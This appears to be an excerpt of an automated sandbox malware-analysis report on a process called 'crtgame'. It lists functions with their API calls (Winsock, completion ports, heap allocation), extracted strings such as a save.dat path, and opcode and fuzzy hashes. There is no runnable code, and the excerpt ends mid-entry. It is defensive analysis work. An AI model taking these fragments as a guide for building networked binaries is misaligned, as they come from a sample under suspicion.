                                                                                                            • Instruction ID: 481f680f45e20daac694abfc6533fefe31c8d4e70012da3eacd49e739e44b272
                                                                                                            • Opcode Fuzzy Hash: 3f0b02856b9c37a8304a60430c210a316ef8de9022404cc700c50693d76ba7ab
                                                                                                            • Instruction Fuzzy Hash: 49F01776642615BBDB01AFA1ED88FCBBBACFB54751F000512F60182441DB61BA69CBE1
                                                                                                            APIs
                                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?), ref: 02C230C3
                                                                                                            • WSAStringToAddressA.WS2_32(?,00000017,00000000,?,?), ref: 02C23102
                                                                                                            • _memcmp.LIBCMT ref: 02C23141
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressErrorLastString_memcmp
                                                                                                            • String ID: 255.255.255.255
                                                                                                            • API String ID: 1618111833-2422070025
                                                                                                            • Opcode ID: bc802be544b4ac23c2f480c079663d194c2241acb83f87d4b720531efe556ecd
                                                                                                            • Instruction ID: 102ef25258f9cc482278937b26f5a28caeacb477adbe4be48648d65488c51ed7
                                                                                                            • Opcode Fuzzy Hash: bc802be544b4ac23c2f480c079663d194c2241acb83f87d4b720531efe556ecd
                                                                                                            • Instruction Fuzzy Hash: BA31E473A003689FDB219F74CC8076EB7B6AF85314F1049ADEC559B280DF759A49CB90
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C21F5B
                                                                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02C21FC5
                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 02C21FD2
                                                                                                              • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                                            • String ID: iocp
                                                                                                            • API String ID: 998023749-976528080
                                                                                                            • Opcode ID: b18b6630d8d72549737c5e74dc07e089c0257f1792b28d189c543f2b1993f6d7
                                                                                                            • Instruction ID: 186c28363d9d69895b27cf5e448f57cebdfa62ed8104c2d569fdeaded2fe9bee
                                                                                                            • Opcode Fuzzy Hash: b18b6630d8d72549737c5e74dc07e089c0257f1792b28d189c543f2b1993f6d7
                                                                                                            • Instruction Fuzzy Hash: FC21C5B1901B449FC720DF6AD50455BFBF8FFA4720B108A1FD4A697AA0D7B0A644CF91
                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 02C33585
                                                                                                              • Part of subcall function 02C329CC: __FF_MSGBANNER.LIBCMT ref: 02C329E3
                                                                                                              • Part of subcall function 02C329CC: __NMSG_WRITE.LIBCMT ref: 02C329EA
                                                                                                              • Part of subcall function 02C329CC: RtlAllocateHeap.NTDLL(00990000,00000000,00000001), ref: 02C32A0F
                                                                                                            • std::exception::exception.LIBCMT ref: 02C335A3
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 02C335B8
                                                                                                              • Part of subcall function 02C33F7A: RaiseException.KERNEL32(?,?,?,02C50F6C,?,00000400,?,?,?,02C335BD,?,02C50F6C,00000000,00000001), ref: 02C33FCF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                            • String ID: bad allocation
                                                                                                            • API String ID: 3074076210-2104205924
                                                                                                            • Opcode ID: 0e8fbfa288948fd14c446075b89951d3ed8a27d946800fbfc1415a2e2d7abe48
                                                                                                            • Instruction ID: 4e3485fed15f63837cf2284705701b2f44edf6ce3ebf81cce4e2b7e4459b71b4
                                                                                                            • Opcode Fuzzy Hash: 0e8fbfa288948fd14c446075b89951d3ed8a27d946800fbfc1415a2e2d7abe48
                                                                                                            • Instruction Fuzzy Hash: BEE0307150020AAADF02AEA4DD049AFBB69AB04354F404EE5EC15A6590DF729B44D9E1
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C237B6
                                                                                                            • __localtime64.LIBCMT ref: 02C237C1
                                                                                                              • Part of subcall function 02C32020: __gmtime64_s.LIBCMT ref: 02C32033
                                                                                                            • std::exception::exception.LIBCMT ref: 02C237D9
                                                                                                              • Part of subcall function 02C31EF3: std::exception::_Copy_str.LIBCMT ref: 02C31F0C
                                                                                                              • Part of subcall function 02C29EC7: __EH_prolog.LIBCMT ref: 02C29ECC
                                                                                                              • Part of subcall function 02C29EC7: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C29EDB
                                                                                                              • Part of subcall function 02C29EC7: __CxxThrowException@8.LIBCMT ref: 02C29EFA
                                                                                                            Strings
                                                                                                            • could not convert calendar time to UTC time, xrefs: 02C237CE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                                            • String ID: could not convert calendar time to UTC time
                                                                                                            • API String ID: 1963798777-2088861013
                                                                                                            • Opcode ID: 1c3773b69f75adbd2ecb97554c4a8858b8dc3867965a14a7ee123282638a0c88
                                                                                                            • Instruction ID: 77bdcfcf2a3a3b72b8eced6874e79c34522c5c2ae4bc46c20e2c3a03cf5ffaca
                                                                                                            • Opcode Fuzzy Hash: 1c3773b69f75adbd2ecb97554c4a8858b8dc3867965a14a7ee123282638a0c88
                                                                                                            • Instruction Fuzzy Hash: CDE06DB1D002999BCF15EF94D9047EFB779FB14304F00499AD815A2640DF355A09DE81
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02C24149), ref: 02C30DDF
                                                                                                              • Part of subcall function 02C23FDC: __EH_prolog.LIBCMT ref: 02C23FE1
                                                                                                              • Part of subcall function 02C23FDC: CreateEventA.KERNEL32(00000000,02C2A5D9,?,00000000), ref: 02C23FF3
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C30DD4
                                                                                                            • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02C24149), ref: 02C30E20
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02C24149), ref: 02C30EF1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$Event$CreateH_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 2825413587-0
                                                                                                            • Opcode ID: 50ac837d223931f405701380eb20b0cffee39cd902c0b3ca2aceb397fb3a905b
                                                                                                            • Instruction ID: 6754f713ef2d65f234bcc7746fd749e5fed268ea96d6f63bab0af68a3ec6d758
                                                                                                            • Opcode Fuzzy Hash: 50ac837d223931f405701380eb20b0cffee39cd902c0b3ca2aceb397fb3a905b
                                                                                                            • Instruction Fuzzy Hash: 005196766003458FDB22DF28C88475B77E5FF88328F154B18E899A7390D735E945CB91
                                                                                                            APIs
                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C3F96B
                                                                                                            • __isleadbyte_l.LIBCMT ref: 02C3F999
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,00000000,00000000,?), ref: 02C3F9C7
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,00000000,00000000,?), ref: 02C3F9FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                            • String ID:
                                                                                                            • API String ID: 3058430110-0
                                                                                                            • Opcode ID: 04315e5edc3580ff205cb9c6771e5bfced7ae5537b05d78fbb8520729968d777
                                                                                                            • Instruction ID: f712e8b5d63da81ac71512546f502bb8055674d7033a7aea54715d18a589369a
                                                                                                            • Opcode Fuzzy Hash: 04315e5edc3580ff205cb9c6771e5bfced7ae5537b05d78fbb8520729968d777
                                                                                                            • Instruction Fuzzy Hash: 3531CC31A00286BFDB228E35C844BBA7BA6FF81314F154C2DE869975A0E730E950DB90
                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 02C3FDD0
                                                                                                              • Part of subcall function 02C329CC: __FF_MSGBANNER.LIBCMT ref: 02C329E3
                                                                                                              • Part of subcall function 02C329CC: __NMSG_WRITE.LIBCMT ref: 02C329EA
                                                                                                              • Part of subcall function 02C329CC: RtlAllocateHeap.NTDLL(00990000,00000000,00000001), ref: 02C32A0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 501242067-0
                                                                                                            • Opcode ID: ee55a7a9e3733ab81ac186e760eeb2a88a793c5f05bc60699ece669345854e49
                                                                                                            • Instruction ID: 8fe8669e49db3971d5d5eac6b81c3bffebfa694011c6e674fd81700901756c15
                                                                                                            • Opcode Fuzzy Hash: ee55a7a9e3733ab81ac186e760eeb2a88a793c5f05bc60699ece669345854e49
                                                                                                            • Instruction Fuzzy Hash: FD110632C40712AFCF233F74A80875A7BDA9F083A1B104E2EE94D96690DB30C980DE91
                                                                                                            APIs
                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C31DB2
                                                                                                            • ___ascii_stricmp.LIBCMT ref: 02C31DEA
                                                                                                            • __tolower_l.LIBCMT ref: 02C31E00
                                                                                                              • Part of subcall function 02C3539A: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C353A8
                                                                                                              • Part of subcall function 02C3539A: __isctype_l.LIBCMT ref: 02C353C9
                                                                                                            • __tolower_l.LIBCMT ref: 02C31E0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Locale$UpdateUpdate::___tolower_l$___ascii_stricmp__isctype_l
                                                                                                            • String ID:
                                                                                                            • API String ID: 2995433114-0
                                                                                                            • Opcode ID: 5a6fd3737516604066ab84fcf8fec551fc8a64089d8b76893633279989ef553f
                                                                                                            • Instruction ID: 71b5c9b9da41b6bcf8265044043fafd51f06cffa0216bd9afdfa15ea42a630cc
                                                                                                            • Opcode Fuzzy Hash: 5a6fd3737516604066ab84fcf8fec551fc8a64089d8b76893633279989ef553f
                                                                                                            • Instruction Fuzzy Hash: 92110D729001596FC713AA698884B7A77A9EB45360F180F58E82957180EFB15E01DA90
                                                                                                            APIs
                                                                                                            • htons.WS2_32(?), ref: 02C23DA2
                                                                                                              • Part of subcall function 02C23BD3: __EH_prolog.LIBCMT ref: 02C23BD8
                                                                                                              • Part of subcall function 02C23BD3: std::bad_exception::bad_exception.LIBCMT ref: 02C23BED
                                                                                                            • htonl.WS2_32(00000000), ref: 02C23DB9
                                                                                                            • htonl.WS2_32(00000000), ref: 02C23DC0
                                                                                                            • htons.WS2_32(?), ref: 02C23DD4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                                            • String ID:
                                                                                                            • API String ID: 3882411702-0
                                                                                                            • Opcode ID: fe6904b5f68d4df33819c9232d56288bac1181f65cee1f5632822fbb3fc47cb2
                                                                                                            • Instruction ID: 93cef359744148741e6c31dc23e0e63c102628f62cb8d5be539c041f174caad6
                                                                                                            • Opcode Fuzzy Hash: fe6904b5f68d4df33819c9232d56288bac1181f65cee1f5632822fbb3fc47cb2
                                                                                                            • Instruction Fuzzy Hash: 6111E139A00248EFCF019F64D885A5AB7B9FF08310F008896FC08DF201DB71DA18CBA1
                                                                                                            APIs
                                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000001,?,?,00000001,?,?,02C2335F,?,?,?,?,?), ref: 02C223D0
                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02C223DE
                                                                                                            • InterlockedExchange.KERNEL32(00000030,00000001), ref: 02C22401
                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02C22408
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 4018804020-0
                                                                                                            • Opcode ID: e5e277de811cf135e1279240513c5cd8d0c03bfe673b12dfe0c5c9483fcc0aca
                                                                                                            • Instruction ID: 74d81a120d181cb75b4fefee1014399561d1b75899c336730ba1c55b0253ca06
                                                                                                            • Opcode Fuzzy Hash: e5e277de811cf135e1279240513c5cd8d0c03bfe673b12dfe0c5c9483fcc0aca
                                                                                                            • Instruction Fuzzy Hash: 7D11CE71601314ABDB209F60CA84BABBBB8FF50704F1044ADFA019A140DBB1FA49CBE1
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                            • String ID:
                                                                                                            • API String ID: 3016257755-0
                                                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                            • Instruction ID: 3a58d4ec9950d7b2b0e97018edc3fb1f984fac3f849c69325f9466e78e685e4d
                                                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                            • Instruction Fuzzy Hash: AE01083604014ABBCF136ED8CC458EE3F66BB59754B498816FA28A9131D737C6B1AB81
                                                                                                            APIs
                                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C224A9
                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02C224B8
                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C224CD
                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02C224D4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 4018804020-0
                                                                                                            • Opcode ID: 6fbe5d34d1ccb4e84365d70e99e127b3df6e19a0de5c5ae8ace1bc6d5da4963a
                                                                                                            • Instruction ID: 20079598d806430e6869a21e49d99297db61bcf7dede0241b2aeb570d661c955
                                                                                                            • Opcode Fuzzy Hash: 6fbe5d34d1ccb4e84365d70e99e127b3df6e19a0de5c5ae8ace1bc6d5da4963a
                                                                                                            • Instruction Fuzzy Hash: D7F03C76641215AFDB009FA5E884B9BBBACFF54710F008559FA04C6141D771E668CFE1
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C22009
                                                                                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 02C22028
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C22037
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C2204E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                                            • String ID:
                                                                                                            • API String ID: 2456309408-0
                                                                                                            • Opcode ID: fb0ceeccb6bc019126117f67f4c26b94aff6cce9b424cfddd9db69e3983888d7
                                                                                                            • Instruction ID: dd3573ea6b32e3a3c5cb9a341259e6ae011f66b5fb7bd08cdd28aa090c7083a7
                                                                                                            • Opcode Fuzzy Hash: fb0ceeccb6bc019126117f67f4c26b94aff6cce9b424cfddd9db69e3983888d7
                                                                                                            • Instruction Fuzzy Hash: 5A01A9718007208FC739AF64E908BABFBF5EF08709F004A1DE84692590CB70A64CDF91
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$H_prologSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 1765829285-0
                                                                                                            • Opcode ID: 34343df4b41348d5ff3ae6ce59df3a8da7a08df31150ce78c1ade24de5ce2b94
                                                                                                            • Instruction ID: aa761c23029fcb7fc8ece9dd83108dd1912863bcc67247ad7e3ceba72d77d6e1
                                                                                                            • Opcode Fuzzy Hash: 34343df4b41348d5ff3ae6ce59df3a8da7a08df31150ce78c1ade24de5ce2b94
                                                                                                            • Instruction Fuzzy Hash: 3CF05475A41110DFCB109FA4D8C8B8EFBA5FF0D311F1082A9F619DB290CB359854CB91
                                                                                                            APIs
                                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02C27D72,?,?,00000000), ref: 02C2906F
                                                                                                            • getsockname.WS2_32(?,?,?), ref: 02C29085
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastgetsockname
                                                                                                            • String ID: &'
                                                                                                            • API String ID: 566540725-655172784
                                                                                                            • Opcode ID: c5aad58c29924d08a8c0b983e2ba59f7477c700a532edaf67a5ac0f67529aa9e
                                                                                                            • Instruction ID: 6d86d69684b253526720ef0d09a271f5cf63de09e54dc697928ebf55abf7c814
                                                                                                            • Opcode Fuzzy Hash: c5aad58c29924d08a8c0b983e2ba59f7477c700a532edaf67a5ac0f67529aa9e
                                                                                                            • Instruction Fuzzy Hash: 8D215176A00258DBDB10DF78D844ACEB7F5FF4C314F20856AE918EB280EB30E9458B94
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C2C653
                                                                                                              • Part of subcall function 02C2CC2F: std::exception::exception.LIBCMT ref: 02C2CC5E
                                                                                                              • Part of subcall function 02C2D3E5: __EH_prolog.LIBCMT ref: 02C2D3EA
                                                                                                              • Part of subcall function 02C3356D: _malloc.LIBCMT ref: 02C33585
                                                                                                              • Part of subcall function 02C2CC8E: __EH_prolog.LIBCMT ref: 02C2CC93
                                                                                                            Strings
                                                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02C2C689
                                                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C2C690
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                                            • API String ID: 1953324306-1943798000
                                                                                                            • Opcode ID: b1f26ba802bcfe648ef62a87a81b86141eb044fd700c1b07c18cc1c8e9785c2d
                                                                                                            • Instruction ID: 4c42042f81936f0207b065869c2bf3bda432a155119c53f59fbebb80a9506c09
                                                                                                            • Opcode Fuzzy Hash: b1f26ba802bcfe648ef62a87a81b86141eb044fd700c1b07c18cc1c8e9785c2d
                                                                                                            • Instruction Fuzzy Hash: 8A21B1B1E002689BDB04EFE4D944BEEBBB5EF54704F00455EE806AB280DF749A48DF91
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C2C748
                                                                                                              • Part of subcall function 02C2CD06: std::exception::exception.LIBCMT ref: 02C2CD33
                                                                                                              • Part of subcall function 02C2D51C: __EH_prolog.LIBCMT ref: 02C2D521
                                                                                                              • Part of subcall function 02C3356D: _malloc.LIBCMT ref: 02C33585
                                                                                                              • Part of subcall function 02C2CD63: __EH_prolog.LIBCMT ref: 02C2CD68
                                                                                                            Strings
                                                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C2C785
                                                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02C2C77E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                                            • API String ID: 1953324306-412195191
                                                                                                            • Opcode ID: 38b496e7e2ca2942586e9559241a06869390152918339054c62837f7b2258a86
                                                                                                            • Instruction ID: 21e443873f2a136ce576da4f7022a7a98de9ef33defb646088389e993c00bdff
                                                                                                            • Opcode Fuzzy Hash: 38b496e7e2ca2942586e9559241a06869390152918339054c62837f7b2258a86
                                                                                                            • Instruction Fuzzy Hash: 9C2180B1E002649BDB14EFA4D854BAEBBB9EF54704F00455EE806AB280DF749A48DF90
                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 02C25288
                                                                                                              • Part of subcall function 02C329CC: __FF_MSGBANNER.LIBCMT ref: 02C329E3
                                                                                                              • Part of subcall function 02C329CC: __NMSG_WRITE.LIBCMT ref: 02C329EA
                                                                                                              • Part of subcall function 02C329CC: RtlAllocateHeap.NTDLL(00990000,00000000,00000001), ref: 02C32A0F
                                                                                                            • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00002000,00000000,00000001,00000000,00000000,?,02C275C8), ref: 02C2529A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                                                            • String ID: \save.dat
                                                                                                            • API String ID: 4128168839-3580179773
                                                                                                            • Opcode ID: a65794d8f55fe67e88daa1392b523614a4b38be63979f0ea52133b8c00a651d5
                                                                                                            • Instruction ID: 52e7f60cfd1b695b943e04733d89a0b9e01550a2c20c57287bf1e71df289c0c6
                                                                                                            • Opcode Fuzzy Hash: a65794d8f55fe67e88daa1392b523614a4b38be63979f0ea52133b8c00a651d5
                                                                                                            • Instruction Fuzzy Hash: 0A1190329042552BDB269E64CC80E6FFF67DFC26A0B5046ECE84967142DE731E06C6E0
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C2396A
                                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02C239C1
                                                                                                              • Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428
                                                                                                              • Part of subcall function 02C29FBD: __EH_prolog.LIBCMT ref: 02C29FC2
                                                                                                              • Part of subcall function 02C29FBD: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C29FD1
                                                                                                              • Part of subcall function 02C29FBD: __CxxThrowException@8.LIBCMT ref: 02C29FF0
                                                                                                            Strings
                                                                                                            • Day of month is not valid for year, xrefs: 02C239AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                            • String ID: Day of month is not valid for year
                                                                                                            • API String ID: 1404951899-1521898139
                                                                                                            • Opcode ID: 915076f651f27c9df109bec185bfe3baa0d93ff8801f20d287f43245f5eb9637
                                                                                                            • Instruction ID: ad1e9c21ad78b1b8769d4272ba1118a63cf7de8ad722a01688c784590077b229
                                                                                                            • Opcode Fuzzy Hash: 915076f651f27c9df109bec185bfe3baa0d93ff8801f20d287f43245f5eb9637
                                                                                                            • Instruction Fuzzy Hash: D101B17A914219AADB04EFA4D845AEFB779FF18710F10401BEC04A3210EF705A49DB95
                                                                                                            APIs
                                                                                                            • std::exception::exception.LIBCMT ref: 02C2F523
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 02C2F538
                                                                                                              • Part of subcall function 02C3356D: _malloc.LIBCMT ref: 02C33585
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                            • String ID: bad allocation
                                                                                                            • API String ID: 4063778783-2104205924
                                                                                                            • Opcode ID: 1fa85a20eaa46984b41b97a65411df5cc247bed8ef6625210cc05af66e2fa76f
                                                                                                            • Instruction ID: 2ea8e1b2e41833cac5ae11400298736569b55289444b906f63dcd2871a4fc694
                                                                                                            • Opcode Fuzzy Hash: 1fa85a20eaa46984b41b97a65411df5cc247bed8ef6625210cc05af66e2fa76f
